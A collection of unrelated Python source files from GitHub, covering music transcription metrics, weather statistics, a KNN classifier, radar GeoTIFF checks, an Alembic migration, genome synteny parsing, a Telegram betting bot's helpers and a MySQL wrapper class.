return np.sum(np.logical_and(data == 1, target == 1),axis=(1,2))
def FP(data,target):
return np.sum(np.logical_and(data == 1, target == 0),axis=(1,2))
def FN(data,target):
return np.sum(np.logical_and(data == 0, target == 1),axis=(1,2))
def precision(data,target,mean=True):
tp = TP(data,target).astype(float)
fp = FP(data,target)
pre_array = tp/(tp+fp+np.full(tp.shape,np.finfo(float).eps))
if mean:
return np.mean(pre_array)
else :
return pre_array
def recall(data,target,mean=True):
tp = TP(data,target).astype(float)
fn = FN(data,target)
rec_array = tp/(tp+fn+np.full(tp.shape,np.finfo(float).eps))
if mean:
return np.mean(rec_array)
else :
return rec_array
def accuracy(data,target,mean=True):
tp = TP(data,target).astype(float)
fp = FP(data,target)
fn = FN(data,target)
acc_array = tp/(tp+fp+fn+np.full(tp.shape,np.finfo(float).eps))
if mean :
return np.mean(acc_array)
else :
return acc_array
def Fmeasure(data,target,mean=True):
prec = precision(data,target,mean=False)
rec = recall(data,target,mean=False)
if mean:
return np.mean(2*prec*rec/(prec+rec+np.full(prec.shape,np.finfo(float).eps)))
else :
return 2*prec*rec/(prec+rec+np.full(prec.shape,np.finfo(float).eps))
def compute_eval_metrics_frame(data1,data2,threshold=None):
if not threshold==None:
idx = data1[:,:,:] > threshold
data1 = idx.astype(int)
prec = precision(data1,data2)
rec = recall(data1,data2)
# acc = accuracy(data1,data2)
F = Fmeasure(data1,data2)
return F, prec, rec
def compute_eval_metrics_note(data1,data2,fs,threshold=None,min_dur=None,tolerance=None):
if not threshold==None:
idx = data1[:,:,:] > threshold
data1 = idx.astype(int)
if min_dur==None:
data_filt = filter_short_notes(data1,thresh=int(round(fs*0.05)))
elif min_dur == 0:
data_filt = data1
else:
data_filt = filter_short_notes(data1,thresh=int(round(fs*min_dur)))
results = []
if tolerance == None:
tolerance = 0.05
for data, target in zip(data_filt,data2):
notes_est , intervals_est = get_notes_intervals(data, fs)
# print notes_est.shape
# print intervals_est.shape
notes_ref , intervals_ref = get_notes_intervals(target, fs)
# pairs = mir_eval.transcription.match_notes(intervals_ref, notes_ref, intervals_est, notes_est, onset_tolerance=0.8, pitch_tolerance=0.25, offset_ratio=None)
# for i,j in pairs:
# print ""
# print notes_ref[i], intervals_ref[i]
# print notes_est[j], intervals_est[j]
P,R,F,_ = mir_eval.transcription.precision_recall_f1_overlap(intervals_ref,notes_ref,intervals_est,notes_est,pitch_tolerance=0.25,offset_ratio=None,onset_tolerance=tolerance)
results += [[F,P,R]]
results_mean = np.mean(np.array(results),axis=0)
return results_mean
def get_best_thresh(inputs, targets,verbose=False):
F_list1 = []
thresh_list1 = np.arange(0,1,0.1)
for thresh in thresh_list1:
inputs_thresh = (inputs>thresh).astype(int)
F = Fmeasure(inputs_thresh, targets)
F_list1 += [F]
max_value1 = max(F_list1)
max_index1 = F_list1.index(max_value1)
max_thresh1 = thresh_list1[max_index1]
F_list2 = []
thresh_list2 = np.arange(max(0,max_thresh1-0.09),min(1,max_thresh1+0.095),0.01)
for thresh in thresh_list2:
inputs_thresh = (inputs>thresh).astype(int)
F = Fmeasure(inputs_thresh, targets)
F_list2 += [F]
max_value2 = max(F_list2)
max_index2 = F_list2.index(max_value2)
max_thresh2 = thresh_list2[max_index2]
if verbose:
print("Best F0 : "+str(max_value2))
print("Best thresh : "+str(max_thresh2))
return max_thresh2, max_value2
| adrienycart/MLM_decoding | mlm_training/utils.py | utils.py | py | 10,758 | python | en | code | 5 | github-code | 90 |
37232690557 | '''
Given path to training weather data (directory), return mean and std-dev of temperature and PM2.5
Note the weather data covers all districts
Arguments:
1) Directory path to training weather data
Returns a tuple of (temp_mu, temp_sigma, pm25_mu, pm25_sigma)
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
def calc_weather_mu_sigma(training_weather_data_path):
# Lists to store individual temperature and PM2.5 levels
temps = []
pm25s = []
# Make sure training data path exists
assert os.path.exists(training_weather_data_path), 'calc_weather_mu_sigma.py: Training data directory does not exist'
# Parse each weather file in training weather data
for filename in os.listdir(training_weather_data_path):
filename_full = os.path.join(training_weather_data_path, filename)
# Parse individual weather data file
with open(filename_full) as f:
for line in f:
line_vals = line.split()
# Append to temperature and PM2.5 lists
temps.append(float(line_vals[3]))
pm25s.append(float(line_vals[4]))
# Find mean and std-dev of temperature and PM2.5
temp_mu = np.mean(temps)
temp_sigma = np.std(temps)
pm25_mu = np.mean(pm25s)
pm25_sigma = np.std(pm25s)
return (temp_mu, temp_sigma, pm25_mu, pm25_sigma)
if __name__ == '__main__':
print(calc_weather_mu_sigma('../data/training_data/weather_data'))
| georgesung/ml_competition_didi | preprocess_data/calc_weather_mu_sigma.py | calc_weather_mu_sigma.py | py | 1,437 | python | en | code | 5 | github-code | 90 |
70123534056 | '''
Created_by : Anand Tiwari
Created_At : 20/02/2018
Description : This is the implimnetation of K-NeirestNeighbour Algorithm. I have used MNIST data to
to impliment this algorithm. KNN is both classification and regression algorithm.
In classification, we look on the neirest point and then find which class has more
occurance in those neirest points. In regression, take mean of the neirest points.
In this algorithm fit only stores the input and do nothing all work is done by the
predict. So, it is also called as Lazy Learner. Distance matrix used is Euclidean.
I have used one list(sl1) to store tuple of [(distance, class)]. list contain number of item equal to K.
From that list i had made a dictionary(votes) of {class : number of occurance in the list}.
With this dictionary classification is or prediction is done.
'''
import numpy as np
from utils import get_mnist
from sortedcontainers import SortedList
from datetime import datetime
import matplotlib.pyplot as plt
class KNN(object):
# Initializing nunber of neirest point to be used
def __init__(self, k):
self.k = k
# fit function only stores the inputs data
def fit(self, X, y):
self.X = X
self.y = y
# predict function perform all the work of finding neirest points and classification
def predict(self, X):
# defining output matrix
y = np.zeros(len(X))
# loop for every single point in test data
for i, x in enumerate(X):
# creating a list to store neirest point as a tuple (distance, class)
sl = SortedList(load = self.k)
# loop : single test data point against every input data point
for j, xt in enumerate(self.X):
# measuring distance
diff = x - xt
d = diff.dot(diff)
# adding item to list
# on every iteration we check length of list
# It must be equal to K
if len(sl) < self.k:
sl.add((d, self.y[j]))
else:
if d < sl[-1][0]:
del sl[-1]
sl.add((d, self.y[j]))
# dictionary to store {class : occurance}
votes = {}
for _, v in sl: # v is class
# print(v)
votes[v] = votes.get(v, 0) + 1
# print(votes.get(v, 0)
# dummies
max_count = 0
max_value_count = -1
# looping through every item in the dictionary
# to get most occured class
for v, count in votes.items():
if count > max_count:
max_count = count
max_value_count = v
# assigning the class to that index
y[i] = max_value_count
return y
# Score function gives accuracy of prediction
def score(self, X, y):
pred = self.predict(X)
return np.mean( y == pred)
if __name__ == '__main__':
# getting the data (NOTE: I have used only 2000 data point.)
# You can change this
X, y = get_mnist(2000)
Ntrain = int(0.7 * len(X))
# Train and Test splits
Xtrain, ytrain = X[:Ntrain], y[:Ntrain]
Xtest, ytest = X[Ntrain:], y[Ntrain:]
train_score = []
test_score = []
# choosing optimal K is difficult
# I have used K = 1 to 5
# You can change K as per your requirement
for k in (1, 2, 3, 4, 5):
t0 = datetime.now()
knn = KNN(k)
knn.fit(Xtrain, ytrain)
print("Training Time: ", datetime.now() - t0)
t0 = datetime.now()
print("Training Accuracy: ", knn.score(Xtrain, ytrain))
print("Time to compute train accuracy :", datetime.now() - t0)
train_score.append(knn.score(Xtrain, ytrain))
t0 = datetime.now()
print("Testing Accuracy: ", knn.score(Xtest, ytest))
print("Time to compute test accuracy :", datetime.now() - t0)
test_score.append(knn.score(Xtest, ytest))
print("\n")
# plottings
plt.plot(train_score, label = 'Train Score')
plt.plot(test_score, label = 'Test Score')
plt.xlim(1, 6)
plt.xticks( range(1, 6) )
plt.legend()
plt.show()
| AnandTiwari1997/ML-Algorithm-Scratch | KNN_Training_And_Prediction.py | KNN_Training_And_Prediction.py | py | 3,885 | python | en | code | 0 | github-code | 90 |
22666195300 | import argparse
import datetime
import os
import shutil
import subprocess
import sys
import tempfile
import gdal
import numpy as np
from tdm.radar import utils
gdal.UseExceptions()
SpatialReference = gdal.osr.SpatialReference
splitext = os.path.splitext
strftime = datetime.datetime.strftime
strptime = datetime.datetime.strptime
# https://www.awaresystems.be/imaging/tiff/tifftags/datetime.html
TIFF_DT_FMT = "%Y-%m-%d %H:%M:%S"
def compare_gtiff(fn1, fn2):
ds1, ds2 = [gdal.Open(_) for _ in (fn1, fn2)]
assert ds1.GetGeoTransform() == ds2.GetGeoTransform()
sr1, sr2 = [SpatialReference(wkt=_.GetProjectionRef()) for _ in (ds1, ds2)]
assert sr1.IsSame(sr2)
assert ds1.RasterCount == ds2.RasterCount == 1
b1, b2 = [_.GetRasterBand(1) for _ in (ds1, ds2)]
ma1, ma2 = [utils.band_to_ma(_) for _ in (b1, b2)]
assert np.array_equal(ma1.mask, ma2.mask)
assert np.ma.allclose(ma1, ma2, atol=1e-4)
def rm_f(*paths):
for p in paths:
try:
os.unlink(p)
except FileNotFoundError:
pass
def main(args):
dt_path_pairs = utils.get_images(args.png_img_dir)
ga = utils.GeoAdapter(args.footprint)
gtiff_map = utils.scan_gtiffs(args.gtiff_img_dir)
assert {_[0] for _ in dt_path_pairs}.issubset(gtiff_map)
wd = tempfile.mkdtemp(prefix="tdm_")
in_fn = os.path.join(wd, "orig.tif")
warped_fn = os.path.join(wd, "warped.tif")
t_srs = "EPSG:4326"
n_pairs = len(dt_path_pairs)
for i, (dt, path) in enumerate(dt_path_pairs):
rm_f(in_fn, warped_fn)
print("checking %s (%d/%d)" % (gtiff_map[dt], i + 1, n_pairs))
signal = utils.get_image_data(path)
rain = utils.estimate_rainfall(signal)
metadata = {"TIFFTAG_DATETIME": strftime(dt, TIFF_DT_FMT)}
ga.save_as_gtiff(in_fn, rain, metadata)
subprocess.check_call(["gdalwarp", "-t_srs", t_srs, in_fn, warped_fn])
compare_gtiff(gtiff_map[dt], warped_fn)
shutil.rmtree(wd)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("png_img_dir", metavar="PNG_IMG_DIR")
parser.add_argument("footprint", metavar="GEOTIFF_FOOTPRINT")
parser.add_argument("gtiff_img_dir", metavar="GEOTIFF_IMG_DIR")
main(parser.parse_args(sys.argv[1:]))
| tdm-project/tdm-tools | tools/check_raw_to_warped.py | check_raw_to_warped.py | py | 2,293 | python | en | code | 0 | github-code | 90 |
26659484081 | """CM-563 Add full_name to users
Revision ID: f67f1970ee20
Revises: 2163c84d2cc6
Create Date: 2021-05-03 22:20:30.103778
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mssql
# revision identifiers, used by Alembic.
revision = "f67f1970ee20"
down_revision = "2163c84d2cc6"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("users", sa.Column("full_name", sa.String(length=50), nullable=False))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column("users", "full_name")
# ### end Alembic commands ###
| ClimateMind/climatemind-backend | migrations/versions/202105032220-f67f1970ee20_cm_563_add_full_name_to_users.py | 202105032220-f67f1970ee20_cm_563_add_full_name_to_users.py | py | 718 | python | en | code | 14 | github-code | 90 |
12285910400 | """
i-ADHoRe Processing
"""
import glob
import os
import json
import yaml
import pickle
from misc.string import check_folder_path, is_int
def iadhore_family_to_dict(infile):
"""
Convert i-ADHoRe family to Python dictionary
:param infile: i-ADHoRe family file
:return: Python dictionary Gene ID -> Family ID
"""
family_dict = dict()
fin = open(infile, 'r')
for line in fin.readlines():
key, value = line.strip().split("\t")
family_dict[key] = value
return family_dict
def iadhore_list_family_filtering(iadhore_genes_list, iadhore_family_file, outfolder):
"""
Select only genes that are in the family file
:param outfolder: Output folder
:param iadhore_genes_list: i-ADHoRe list
:param iadhore_family_file: i-ADHoRe family file
:return:
"""
iadhore_genes_list = check_folder_path(iadhore_genes_list)
outfolder = check_folder_path(outfolder, True)
family_genes = set(iadhore_family_to_dict(iadhore_family_file).keys())
for p in glob.glob(iadhore_genes_list + '**/*'):
if os.path.isfile(p):
# get set of genes
list_genes = set()
fin = open(p, 'r')
for line in fin.readlines():
list_genes.add(line.strip()[:-1])
fin.close()
# check the difference
exception_genes = list_genes.difference(family_genes)
if len(exception_genes) < len(list_genes):
sub_outfolder = outfolder + os.path.split(os.path.dirname(p))[-1]
sub_outfolder = check_folder_path(sub_outfolder, True)
outfile = sub_outfolder + os.path.basename(p)
fout = open(outfile, 'w')
# check infile again
fin = open(p, 'r')
for line in fin.readlines():
if line.strip()[:-1] not in exception_genes:
fout.write(line)
fin.close()
fout.close()
def create_iadhore_config(iadhore_genes_list, iadhore_family_file, iadhore_parameter_file, iadhore_result_folder,
outfile):
"""
Create i-ADHoRe configuration file
:param iadhore_genes_list: i-ADHoRe genes list
:param iadhore_family_file: i-ADHoRe family file
:param iadhore_parameter_file: i-ADHoRe parameter file
:param iadhore_result_folder: i-ADHoRe result folder
:param outfile: i-ADHoRe configuration file
:return:
"""
chromosome_dict = dict()
for g in glob.glob(iadhore_genes_list + '**/*'):
if os.path.isfile(g):
species = g.split('/')[-2]
if species not in chromosome_dict.keys():
chromosome_dict[species] = []
chromosome_dict[species].append(g)
else:
chromosome_dict[species].append(g)
fout = open(outfile, 'w')
for key in chromosome_dict.keys():
fout.write('genome=' + key + '\n')
for val in chromosome_dict[key]:
chromosome = os.path.basename(val).split('.')[0]
fout.write(chromosome + ' ' + val + '\n')
fout.write('\n')
iadhore_result_folder = check_folder_path(iadhore_result_folder, True)
fout.write('output_path=' + iadhore_result_folder + '\n')
fout.write('blast_table=' + iadhore_family_file + '\n')
fout.write('table_type=family\n')
with open(iadhore_parameter_file, 'r') as fin:
for line in fin.readlines():
fout.write(line)
fout.close()
def iadhore_result_file_to_dict(infile):
"""
Convert i-ADHoRe result file (multiplicons.txt, segments.txt, list_elements.txt to dict)
:param infile: i-ADHoRe result file
:return: Python dictionary
"""
results = dict()
fin = open(infile, 'r')
lines = fin.readlines()
fin.close()
attributes_keys = lines[0].strip().split("\t")
for i in range(1, len(lines)):
line = lines[i].strip()
line_elem = line.split("\t")
key = is_int(line_elem[0])
attributes = dict()
for j in range(1, len(line_elem)):
attributes[attributes_keys[j]] = is_int(line_elem[j])
results[key] = attributes
return results
def merge_iadhore_file_dict(parent, child, parent_key_in_child, child_key_in_parent):
"""
Merge 2 i-ADHoRe dictiory from i-ADHoRe output file
:param parent: Parent dictionary
:param child: Child dictionary
:param parent_key_in_child: Parent key in child dictionary
:param child_key_in_parent: Child key in parent dictionary
:return: Merged dictionary
"""
for key, value in parent.items():
parent[key][child_key_in_parent] = dict()
for k, v in child.items():
if key == v[parent_key_in_child]:
parent[key][child_key_in_parent][k] = v
# delete the reference key
for key in parent.keys():
value = parent[key][child_key_in_parent]
for k, v in value.items():
del v[parent_key_in_child]
return parent
def iadhore_result_folder_to_dict(infolder):
"""
i-ADHoRe output folder to Python dictionary
:param infolder: i-ADHoRe output folder
:return: Python dictionary
"""
infolder = check_folder_path(infolder)
multiplicons_file = infolder + 'multiplicons.txt'
segments_file = infolder + 'segments.txt'
elements_file = infolder + 'list_elements.txt'
# get dict
multiplicons_dict = iadhore_result_file_to_dict(multiplicons_file)
segments_dict = iadhore_result_file_to_dict(segments_file)
elements_dict = iadhore_result_file_to_dict(elements_file)
# merge segments dict with elements dict
segments_dict = merge_iadhore_file_dict(segments_dict, elements_dict, "segment", "elements")
# merge multiplicon dict with segment dict
multiplicons_dict = merge_iadhore_file_dict(multiplicons_dict, segments_dict, "multiplicon", "segments")
return multiplicons_dict
def get_complete_synteny_dict(input_dictionary):
"""
Filter i-ADHoRe output folder dictionary by selecting only those which have orthologous in all species
:param input_dictionary: i-ADHoRe output folder dictionary
:return:
"""
genomes = set()
for value in input_dictionary.values():
for v in value["segments"].values():
genomes.add(v["genome"])
number_of_genomes = len(genomes)
complete_synteny_dict = dict()
for key, value in input_dictionary.items():
if len(value["segments"]) != number_of_genomes:
continue
genomes_in_segment = set()
for v in value["segments"].values():
genomes_in_segment.add(v["genome"])
number_of_genomes_in_segment = len(genomes_in_segment)
if number_of_genomes_in_segment != number_of_genomes:
continue
# get position intersection
position_intersect = set()
for v in value["segments"].values():
position = set()
for v0 in v["elements"].values():
position.add(v0["position"])
if not position_intersect:
position_intersect = position
continue
position_intersect &= position
new_segments = dict()
for k, v in value["segments"].items():
new_elements = dict()
for k0, v0 in v["elements"].items():
if v0["position"] in position_intersect:
new_elements[k0] = v0
new_segments[k] = v
new_segments[k]["elements"] = new_elements
complete_synteny_dict[key] = value
complete_synteny_dict[key]["segments"] = new_segments
return complete_synteny_dict
def iadhore_result_to_serial(infolder, outfile, ftype="json", complete=False):
"""
Convert i-ADHoRe output to data serialization file
:param complete: Complete synteny, i.e., which has orthologous group in all species
:param ftype: Type of the output file, e.g., JSON and YAML
:param infolder: i-ADHoRe output folder
:param outfile: Data serialization file
:return:
"""
serial_dict = iadhore_result_folder_to_dict(infolder)
if complete:
serial_dict = get_complete_synteny_dict(serial_dict)
fout = open(outfile, 'w')
if ftype == "json":
json.dump(serial_dict, fout, indent=5)
elif ftype == "yaml":
yaml.dump(serial_dict, fout)
elif ftype == "pickle":
fout.close()
fout = open(outfile, 'wb')
pickle.dump(serial_dict, fout)
fout.close()
| ihsanmuchsin/MoSyn | prep/iadhore.py | iadhore.py | py | 8,586 | python | en | code | 0 | github-code | 90 |
37613965704 | import datetime
from typing import List, Dict
import bs4
import re
fmt = "%Y年%m月%d日"
def _parse_fund(data: List[str]) -> Dict:
return {
"date": datetime.datetime.strptime(data[0], fmt).date(),
"share_value": float(data[1]),
"total_value": float(data[2]),
}
def _parse_index(data: List[str]) -> Dict:
return {
"date": datetime.datetime.strptime(data[0], fmt).date(),
"open_v": float(data[1]),
"high_v": float(data[2]),
"low_v": float(data[3]),
"close_v": float(data[4]),
}
def _parse_stock(data: List[str]) -> Dict:
return {
"date": datetime.datetime.strptime(data[0], fmt).date(),
"open_v": float(data[1]),
"high_v": float(data[2]),
"low_v": float(data[3]),
"close_v": float(data[4]),
"volume": float(data[5]),
"final_v": float(data[6]),
}
def _parse_stock_division(data: List[str]) -> Dict:
matched = re.search(u"分割: (.+)株 -> (.+)株", data[1])
return {
"date": datetime.datetime.strptime(data[0], fmt).date(),
"division": "division",
"division_from": float(matched.group(1)),
"division_to": float(matched.group(2)),
}
def parse_json(json_data) -> bool:
if "priceHistory" in json_data:
json_data = json_data["priceHistory"]
data_rows = json_data["history"]["histories"]
if len(data_rows) == 0:
return True
for row in data_rows:
yield {
"date": datetime.datetime.strptime(row["baseDate"], fmt).date(),
"open_v": float(row["openPrice"].replace(",", "")),
"high_v": float(row["highPrice"].replace(",", "")),
"low_v": float(row["lowPrice"].replace(",", "")),
"close_v": float(row["closePrice"].replace(",", "")),
"volume": float(row["volume"].replace(",", "")),
"final_v": float(row["adjustedClosePrice"].replace(",", "")),
}
if "splitHistories" in json_data["history"]:
split = json_data["history"]["splitHistories"]
return False
def parse_json_of_future(json_data) -> bool:
data_rows = json_data["histories"]
if len(data_rows) == 0:
return True
for row in data_rows:
yield {
"date": datetime.datetime.strptime(row["date"], fmt).date(),
"open_v": float(row["openPrice"].replace(",", "")),
"high_v": float(row["highPrice"].replace(",", "")),
"low_v": float(row["lowPrice"].replace(",", "")),
"close_v": float(row["closePrice"].replace(",", "")),
}
return False
def parse_json_split(json_data):
if "priceHistory" in json_data:
json_data = json_data["priceHistory"]
if "splitHistories" in json_data["history"]:
splits = json_data["history"]["splitHistories"]
for split in splits:
yield {
"date": datetime.datetime.strptime(split["splitDate"], fmt).date(),
"division": "division",
"division_from": float(1),
"division_to": float(split["splitRate"].replace(",", "")),
}
def parse_html(html_soup: bs4.BeautifulSoup) -> bool:
table = html_soup.find("table", {"class": "boardFin yjSt marB6"})
table_rows = table.find_all("tr")
header = table_rows[0]
data_rows = table_rows[1:]
if len(data_rows) == 0:
return True
n_cols = len(header.find_all("th"))
if n_cols == 3:
_parse_f = _parse_fund
elif n_cols == 5:
_parse_f = _parse_index
elif n_cols > 5:
_parse_f = _parse_stock
else:
raise ValueError("invalid table, n_cols = {}".format(n_cols))
for row in data_rows:
data = [t.text.replace(",", "") for t in row.find_all("td")]
if len(data) == 2:
yield _parse_stock_division(data)
else:
try:
yield _parse_f(data)
except Exception as e:
print("Error occured", e)
return False
| fx-kirin/yfjpscraper | yfjpscraper/parser.py | parser.py | py | 4,026 | python | en | code | 2 | github-code | 90 |
34951304328 | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 21:19:13 2020
@author: aniru
"""
n=int(input())
k=0
t=0
for i in range(1,n+1):
if n%2==0:
t=n//2
else:
t=(n//2)+1
for j in range(1,n+1):
if j==t-i+1 or j==t+i-1 or i==t and j>1 and j<n or i>t and (j==1 or j==n):
print("*",end="")
else:
print(" ",end='')
print("\n",end='') | Anirudh1905/PYTHON | A pattern.py | A pattern.py | py | 415 | python | en | code | 0 | github-code | 90 |
28941744641 | def ngramsout(gesseq):
geslines = sorted({'-1 %s' % ges[0] for ges in gesseq if ges[0] != '<SIL>'})
geslines.extend(['-99 <s>', '-1 </s>'])
with open('task.arpabo', 'w') as f:
f.write('\\data\\\n')
f.write('ngram 1=%d\n' % len(geslines))
f.write('\n\\1-grams:\n\n')
f.write('\n'.join(geslines))
f.write('\n\n\\end\\\n')
def phonesout(gesseq):
phoneset = sorted({p for ges in gesseq for p in ges[1:]})
with open('phones.txt', 'w') as f:
f.write('\n'.join(phoneset))
def lexiconout(gesseq):
with open('lexicon.txt', 'w') as f:
f.write('\n'.join(' '.join(ges) for ges in gesseq))
f.write('\n')
with open('lexicon_nosil.txt', 'w') as f:
f.write('\n'.join(
' '.join(ges)
for ges in gesseq
if ges[0] != '<SIL>'))
f.write('\n')
def generateall():
gesseq = [
('<SIL>', 'SIL'),
('LongPress', 'longmid'),
('Hush', 'all')]
for n in range(1, 4):
gesseq.append((
'Click%d' % n,
*['shortmid' for i in range(n)]))
for slen in range(1, 13):
for start in range(12):
gesseq.append((
'Clockwise%d' % slen, *[
'short%d' % ((start + i) % 12)
for i in range(slen + 1)]))
gesseq.append((
'CounterClockwise%d' % slen, *[
'short%d' % ((start - i) % 12)
for i in range(slen + 1)]))
return gesseq
def main():
gesseq = generateall()
filter_field = ('<SIL>', 'Hush', 'Click1', 'Click2', 'Click3', 'LongPress')
ex_field = ('LongPress')
#gesseq = [ges for ges in gesseq if ges[0] in filter_field]
#gesseq = [ges for ges in gesseq if ges[0] not in ex_field]
lexiconout(gesseq)
phonesout(gesseq)
ngramsout(gesseq)
if __name__ == '__main__':
main()
| FredWe/touch_project | kaldi/touch-project/s5/local/prepare_dict.py | prepare_dict.py | py | 1,916 | python | en | code | 0 | github-code | 90 |
18169360039 | from itertools import accumulate
N, K, *PC = map(int, open(0).read().split())
P, C = [0] + PC[:N], [0] + PC[N:]
ans = float("-inf")
for start in range(1, N + 1):
path = []
cur = P[start]
path = [C[start]]
while cur != start:
path.append(C[cur])
cur = P[cur]
A = list(accumulate(path))
q, r = divmod(K, len(path))
res = 0
if A[-1] >= 0:
if r == 0:
q -= 1
r += len(path)
res += A[-1] * q
elif q >= 1:
r = len(path)
ans = max(ans, res + max(A[:r]))
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02585/s302147023.py | s302147023.py | py | 566 | python | en | code | 0 | github-code | 90 |
2425268779 | import io
import os
import json
import time
import random
import hashlib
import chain
import config
import keyboa
def creates_a_hash_of_the_winning_number(num): # Создает хеш
salt = os.urandom(64).hex()
data = f'{num} {salt}'
return hashlib.md5(data.encode()).hexdigest(), salt, num
def add_new_user(user_wallet, user_id): # Добовляет нового пользователя
memo = get_new_memo()
users = json_reader(config.USER_FILE_NAME)
if check_for_telegram_id(user_id, users):
return False
if check_the_user_for_availability(user_wallet, users):
users[user_wallet] = {'memo': memo,
'bets': {},
'telegram_id': user_id}
json_writer(users, config.USER_FILE_NAME)
# True - Это ползователя нет, а False - это он есть
def check_the_user_for_availability(name, users):
for x in users:
if x == name:
return False
else:
return True
def check_for_telegram_id(telegram_id, users): # Есть ли такой telegram id
for x in users.values():
if x['telegram_id'] == telegram_id:
return True
def get_new_memo(): # Генерирует новое и уникальное memo
while True:
memo = os.urandom(4).hex()
if checking_memo_for_uniqueness(memo):
break
return memo
def if_text_is_a_number(text: str): # Сообщение это число или нет
try:
if int(text) > 10000 or int(text) < 0:
return config.SPAN_OF_NUMBERS
if 0 < int(text) <= 10000:
return True
else:
return False
except:
return False
def checking_memo_for_uniqueness(memo): # Проверяет memo на уникальность
previous = json_reader(config.USER_FILE_NAME)
for x in previous.values():
if x['memo'] == memo:
return False
else:
return True
def json_writer(data, file_name, encoding='utf8'): # Запись в файл
with io.open(file_name, 'w') as outfile:
json.dump(data, outfile, ensure_ascii=False)
def json_reader(file_name): # Чтение файла
with io.open(file_name, encoding='utf8') as inputFile:
data = json.load(inputFile)
return data
def clearing_bets_after_playing(): # Очищяет ставки после игры
users = json_reader(config.USER_FILE_NAME)
# Сохранить данные
data = json_reader(config.OLD_USERS_FILE_NAME)
data[time.time()] = users
json_writer(data, config.OLD_USERS_FILE_NAME)
for x in users:
users[x]['bets'].clear()
json_writer(users, config.USER_FILE_NAME)
def adding_rate(user_name, bet): # Добовляет ставку (пользователю)
users = json_reader(config.USER_FILE_NAME)
for listt in users[user_name]['bets']:
if listt == str(bet):
return False
else:
users[user_name]['bets'][bet] = False
json_writer(users, config.USER_FILE_NAME)
return True
def get_name_by_id(telegram_id): # Найти имя пользователя по id telegram
users = json_reader(config.USER_FILE_NAME)
for x in users:
if users[x]['telegram_id'] == telegram_id:
return x
def check_for_existence(account): # Проверка аккаунта на существования
try:
chain.account_info(account)['account_name']
return True
except:
return False
def get_hash(): # Возаращяет хеш
return json_reader(config.HASH_FILE_NAME)['hash']
def keyboard_configur(*args): # (list)
return keyboa.Keyboa(args[0]).keyboard
def hash_update(): # Обновления хеша
ran = random.randint(1, 10000)
hashh, salt, num = creates_a_hash_of_the_winning_number(ran)
# Сохранить старые хеши
old = json_reader(config.OLD_HASHES_FILE_NAME)
old[time.time()] = json_reader(config.HASH_FILE_NAME)
json_writer(old, config.OLD_HASHES_FILE_NAME)
# Записать новыйе значения
data = {"num": num, "salt": salt, "hash": hashh}
json_writer(data, config.HASH_FILE_NAME)
# Найти все транзакции с пользователем N
def find_all_transactions_with_a_user(user, txs):
result = []
for x in txs['actions']:
data = x['action_trace']['act']['authorization'][0]['actor']
if data == user:
result.append(x)
return result
# Проверить trx_id на наличие в базе
def сheck_trx_id_for_presence_in_the_database(tx):
users = json_reader(config.USER_FILE_NAME)
for x in users.values():
for us_tx in x['bets']:
if x['bets'][us_tx] == tx:
return True
else:
return False
def get_memo(data):
return data['action_trace']['act']['data']['memo']
def get_tx(data):
return data['action_trace']['trx_id']
def get_quantity(data):
return data['action_trace']['act']['data']['quantity']
def get_user_name(data):
return data['action_trace']['act']['data']['from']
# Заменить false на trx_id
def replace_false_with_trx_id(user_name: str, bet: str, tx: str):
users = json_reader(config.USER_FILE_NAME)
try: # Заменить false на trx_id
if users[user_name]['bets'][bet] == False:
users[user_name]['bets'][bet] = tx
else:
return False
except: # Добавить ставку
users[user_name]['bets'][bet] = tx
'''for x in users[user_name]['bets']:
if x == bet:
if users[user_name]['bets'][x] == False:
users[user_name]['bets'][x] = tx
else:
return False'''
json_writer(users, config.USER_FILE_NAME)
# Присваивать deposit к первой попавшейся ставки
def to_the_first_bet_that_comes_across(user_name, tx):
users = json_reader(config.USER_FILE_NAME)
for bet in users[user_name]['bets']:
if users[user_name]['bets'][bet] == False:
users[user_name]['bets'][bet] = tx
return True
else:
return False
# True добовляет 0.01 | False Обнуляет
def accounting_for_the_prize_fund(waht : bool):
how_much = json_reader(config.PRIZE_FUND)
if waht:
how_much[0] += 0.01
else:
how_much[0] = 0
json_writer(how_much, config.PRIZE_FUND) | ZaViBiS/hotwax | func.py | func.py | py | 6,629 | python | en | code | 0 | github-code | 90 |
19443362785 | import os
import sys
rootpath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))).replace("\\","/")
print("DBTOOL: %s" % rootpath)
syspath=sys.path
sys.path=[]
sys.path.append(rootpath) #指定搜索路径绝对目录
sys.path.extend([rootpath+i for i in os.listdir(rootpath) if i[0]!="."])#将工程目录下的一级目录添加到python搜索路径中
sys.path.extend(syspath)
from core.tools.CommonFunc import *
class DBTool(object):
"""数据库处理类
处理数据库相关操作
"""
def __init__(self, host='', port=3306, username='', password='',db='',isDictCursor = True):
self.__open = False
self.__host = host
self.__port = port
self.__username = username
self.__password = password
self.__db = db
self.__isDictCursor = isDictCursor
self.errMsg = ""
# logging.debug( u"DBTool.py: __init__: 数据库地址:%s。" % host )
# if self.__host != '':
# self.connect()
def __enter__(self):
self.initGlobalDBConf()
return self
def __exit__(self, *args):
self.release()
def initGlobalDBConf(self):
self.__host = DBConf.dbHost
self.__port = DBConf.dbPort
self.__username = DBConf.dbUsername
self.__password = DBConf.dbPassword
self.__db = DBConf.dbName
if self.__host != '' and self.__open == False:
self.connect()
return self
def setCursorDict(self, state = True):
self.__isDictCursor = state
def isDictCursor(self):
return self.__isDictCursor
def connect(self):
if self.__open:
try:
self.__conn.ping()
return True
except:
# 连接出现异常了,重新连接
pass
try:
if self.__db =='':
# 打开数据库连接
self.__conn = pymysql.connect(host=self.__host, user=self.__username,
password=self.__password, port=self.__port)
else:
self.__conn = pymysql.connect(host=self.__host, user=self.__username,
password=self.__password, port=self.__port, db=self.__db)
self.__conn.set_charset('utf8')
self.__open = True
return True
# logging.debug( u"DBTool.py: connect: 数据库连接成功。")
except Exception as e:
logging.error(traceback.format_exc())
self.errMsg = "数据库连接异常!\n%s" % traceback.format_exc()
